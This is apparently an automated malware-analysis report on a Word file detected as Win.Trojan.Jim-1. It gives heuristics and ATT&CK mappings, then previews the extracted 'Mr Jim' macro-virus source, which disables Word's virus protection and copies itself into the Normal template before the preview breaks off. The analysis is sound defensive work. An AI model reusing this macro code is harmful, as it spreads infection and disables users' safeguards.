MALICIOUS
288
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. ClamAV signatures identify this as Win.Trojan.Jim-1, a known malware family. The macro's primary function appears to be downloading and executing a second-stage payload, a common technique for malware distribution.
Heuristics 6
-
ClamAV: Win.Trojan.Jim-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Jim-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 63374 bytes |
SHA-256: 0770e715fea85a34ea52158327a2492b635eaf12c8fcd2275679e2678265d4c5 |
|||
|
Detection
ClamAV:
Win.Trojan.Jim-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' : ÖÄÄùú : ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ· : úùÄÄÄ· :
' ÈÄ : ÈÄÄÄÄÄÄÄÄùú : [ Mr Jim/W97Macro Virus ] : úùÄÄÄÄÄÄļ : ļ
' ù ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ Started 99/03/XXù
' ù -~BY~- $$ ù
' ù $$$$$$$$ $$$$$$$$$ $$$$$$$$ $$$$$$$$ $$$$ $$$$$$$$$ ù
' ú $$$$$ $$$$ $$$$$ $$$$$ $$$$ $$$$$$$$$$ $$ $$$$$$ $$$$ ú
' $$$$$ $$$$$ $$$$$ $$$$ $$$$ $$$$ $$$$
' $$$$$$$$ $$$$$$$$$ $$$$$$$$$$ $$$$ $$$$ $$$$
' ú $$$$ $$$$$ $$$$$ $$$$ $$$$ $$$$ $$$$ ú
' $$$$$ $$$$ $$$$$ $$$$$ $$$$ $$$$ $$$$$$ $$$$
' $$$$$$$$ $$$$$$$$$ $$$$$ $$$$ $$$$ $$$$$$$$
' [Member of Technological Illusions]
' ù ** Stealth, Polymorphic, mIRC, Email, Espionaging virus ** ù
' ù [----------------Some words from our sponsor-------------------] ù
' ú [ Har du vad som krävs för att bli en international ] ú
'ÖÄùú : [ bussiness man? ] :úùÄ·
': ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ :
'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄùú úùÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·
': Greetz : :
'ú Billy_Bel, Darkman, Techno_Phunc, Urgo32, Vecna, Veedee, Simon7 ú
'ú Flitnic, Lord_Arz, Virus-X, Owl, T-2000, Griyo, Opic, Serial Killer ú
'ù The Lich, LovinGod, Yesnah :
'ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄùú úùÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ
'45
Private Sub Document_Open()
'45
'On Error GoTo Host_infiltrated
'45
'It's not my intention to create holocaust, this is just an
'45
'experiment of mine (AI rocks ;)). Follow the instructions for vaccine!
'45
'create c:\_vac.txt for immunity.
'45
Mr_Jim_by_Septic:
'45
generation = 2
'45
check_vac = "c:\_vac.txt"
'45
If Dir(check_vac) <> "" Then MsgBox "I guess you have what it takes.", vbInformation, "[Mr Jim] By SeptiC/TI": GoTo Host_infiltrated
'45
da_normal = Dir(NormalTemplate.FullName)
'45
If da_normal = "" Then GoTo No_normal
'45
SetAttr NormalTemplate.FullName, vbNormal
'45
No_normal:
'45
Application.EnableCancelKey = wdCancelDisabled
'45
Options.VirusProtection = Chr$(48)
'45
Options.SaveNormalPrompt = Chr$(48)
'45
Options.ConfirmConversions = Chr$(48)
'45
Application.ScreenUpdating = Chr$(48)
'45
Application.DisplayStatusBar = Chr$(48)
'45
Application.DisplayAlerts = Chr$(48)
'45
windir = System.PrivateProfileString("c:\msdos.sys", "Paths", "WinDir")
'45
Dim Act_doc As Object: Set Act_doc = ActiveDocument
'45
Dim Act_norm As Object: Set Act_norm = NormalTemplate
'45
If Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then act_inf = 1
'45
If Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then normal_inf = 1
'45
infect_doc:
'45
If act_inf = 1 Then GoTo infect_normal
'45
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'45
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'45
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines
'45
Set fix_lines_1 = b
'45
With fix_lines_1
'45
code_1 = .Lines(1, .CountOfLines)
'45
End With
'45
Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.insertlines 1, code_1
'45
Set polyit = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1))))
'45
temp_number = generation + 1
'45
With polyit.CodeModule
'45
For da_line = 1 To 520 Step
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.